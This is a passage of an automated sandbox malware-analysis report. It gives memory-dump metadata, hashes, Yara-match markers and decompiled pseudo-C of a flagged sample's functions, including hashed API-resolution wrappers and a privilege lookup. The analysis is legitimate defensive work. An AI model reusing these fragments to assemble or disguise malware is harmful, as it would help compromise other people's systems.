                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B20(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                                                                                                                        0x0040726f
                                                                                                                                                        0x00407273
                                                                                                                                                        0x0040727e
                                                                                                                                                        0x0040728a
                                                                                                                                                        0x0040728e
                                                                                                                                                        0x0040729e
                                                                                                                                                        0x004072a3
                                                                                                                                                        0x004072aa
                                                                                                                                                        0x004072ad
                                                                                                                                                        0x004072ba
                                                                                                                                                        0x004072bc
                                                                                                                                                        0x004072be
                                                                                                                                                        0x004072db
                                                                                                                                                        0x004072db
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004072dd
                                                                                                                                                        0x004072e2

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                        • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                        • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                        • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00407235, Relevance: 1.5, APIs: 1, Instructions: 49threadwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                        			E00407235(void* __ebx, void* __edx, void* __eflags) {
				void* _t6;
				int _t7;
				intOrPtr _t10;
				void* _t11;
				void* _t16;
				long _t20;
				void* _t22;
				int _t23;
				void* _t27;

				asm("adc dl, bh");
				if(__eflags <= 0) {
					_t7 = E00413E30(_t22, _t6, 0, 0, 0xc4e7b6d6);
					_t23 = _t7;
					__eflags = _t23;
					if(_t23 != 0) {
						_t20 =  *(_t27 + 0xc);
						_t7 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
						__eflags = _t7;
						if(__eflags == 0) {
							_t7 =  *_t23(_t20, 0x8003, _t27 + (E00409280(__eflags, 1, 8) & 0x000000ff) - 0x40, _t7);
						}
					}
					return _t7;
				} else {
					asm("aas");
					_t10 =  *0x568e29e7;
					_push(_t22);
					_t11 = E00419700(_t10, _t16, 0x11c6f95e);
					return E004195B0(_t16) + _t11 + 0x1000; // executed
				}
			}












                                                                                                                                                        0x00407235
                                                                                                                                                        0x00407237
                                                                                                                                                        0x0040729e
                                                                                                                                                        0x004072a3
                                                                                                                                                        0x004072a8
                                                                                                                                                        0x004072aa
                                                                                                                                                        0x004072ad
                                                                                                                                                        0x004072ba
                                                                                                                                                        0x004072bc
                                                                                                                                                        0x004072be
                                                                                                                                                        0x004072db
                                                                                                                                                        0x004072db
                                                                                                                                                        0x004072dd
                                                                                                                                                        0x004072e2
                                                                                                                                                        0x00407239
                                                                                                                                                        0x00407239
                                                                                                                                                        0x0040723c
                                                                                                                                                        0x00407240
                                                                                                                                                        0x00407246
                                                                                                                                                        0x0040725d
                                                                                                                                                        0x0040725d

                                                                                                                                                        APIs
                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                        • Opcode ID: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
                                                                                                                                                        • Instruction ID: 471561d3f7ca916a2f66550eb52f1a368f70a27f6b475d732e7386b654590829
                                                                                                                                                        • Opcode Fuzzy Hash: 8be962c066e9e1b784657a13098f17ebb0740602b1f9d1d027ef666484d65ed3
                                                                                                                                                        • Instruction Fuzzy Hash: 6EF04C32E8021035E62165A52C43FFA334D4B40B15F05006FFF04FA2C2E6996D0582EA
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004184C9, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                        			E004184C9(void* __eax, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				void* _t9;
				char _t13;
				void* _t14;
				void* _t20;
				void* _t29;

				_pop(_t14);
				_t9 = __eax + 1;
				asm("aaa");
				_t15 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
				_t29 =  !=  ?  *((void*)(_t9 - 0x1374aad2)) : _t14;
				_t10 = _a8;
				_t4 = _t10 + 0xc74; // 0xc74
				E00418DC0(_t20, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t13;
			}








                                                                                                                                                        0x004184c9
                                                                                                                                                        0x004184ca
                                                                                                                                                        0x004184cb
                                                                                                                                                        0x004184cc
                                                                                                                                                        0x004184cc
                                                                                                                                                        0x004184d3
                                                                                                                                                        0x004184df
                                                                                                                                                        0x004184e7
                                                                                                                                                        0x004184fd
                                                                                                                                                        0x00418501

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        • Opcode ID: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
                                                                                                                                                        • Instruction ID: 5cccc2591089b8043b59645ecdbf8b8adda3bc674d5e08dd215ac923b18c5cf1
                                                                                                                                                        • Opcode Fuzzy Hash: 3728b28ccc6d3ee5f517729836873ef245aec0e7b459a85bf7de1199065036ae
                                                                                                                                                        • Instruction Fuzzy Hash: 2CE09AB5200200AFD714EF94CC88EE733A8EF88354F008589FD585B281CA30EC10CBB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x004184df
                                                                                                                                                        0x004184e7
                                                                                                                                                        0x004184fd
                                                                                                                                                        0x00418501

                                                                                                                                                        APIs
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x004184a7
                                                                                                                                                        0x004184bd
                                                                                                                                                        0x004184c1

                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                        0x0041864a
                                                                                                                                                        0x00418660
                                                                                                                                                        0x00418664

                                                                                                                                                        APIs
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                        0x00418513
                                                                                                                                                        0x0041852a
                                                                                                                                                        0x00418538

                                                                                                                                                        APIs
                                                                                                                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00908788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E00908788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0090718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00908460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0090718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00908460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00908460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00908460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0090718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008EE2A8(_t322,  &_v68, _v16);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008EE2A8(_t322,  &_v68, _t236);
								if(E00905553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0090718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008EE2A8(_v12,  &_v68, _v16);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008EE2A8(_t322,  &_v68, _t269);
							if(E00905553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0090718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008E2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008FE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008EE2A8(_v12,  &_v68, _v16);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008FE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008EE2A8(_t322,  &_v68, _t296);
						if(E00905553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
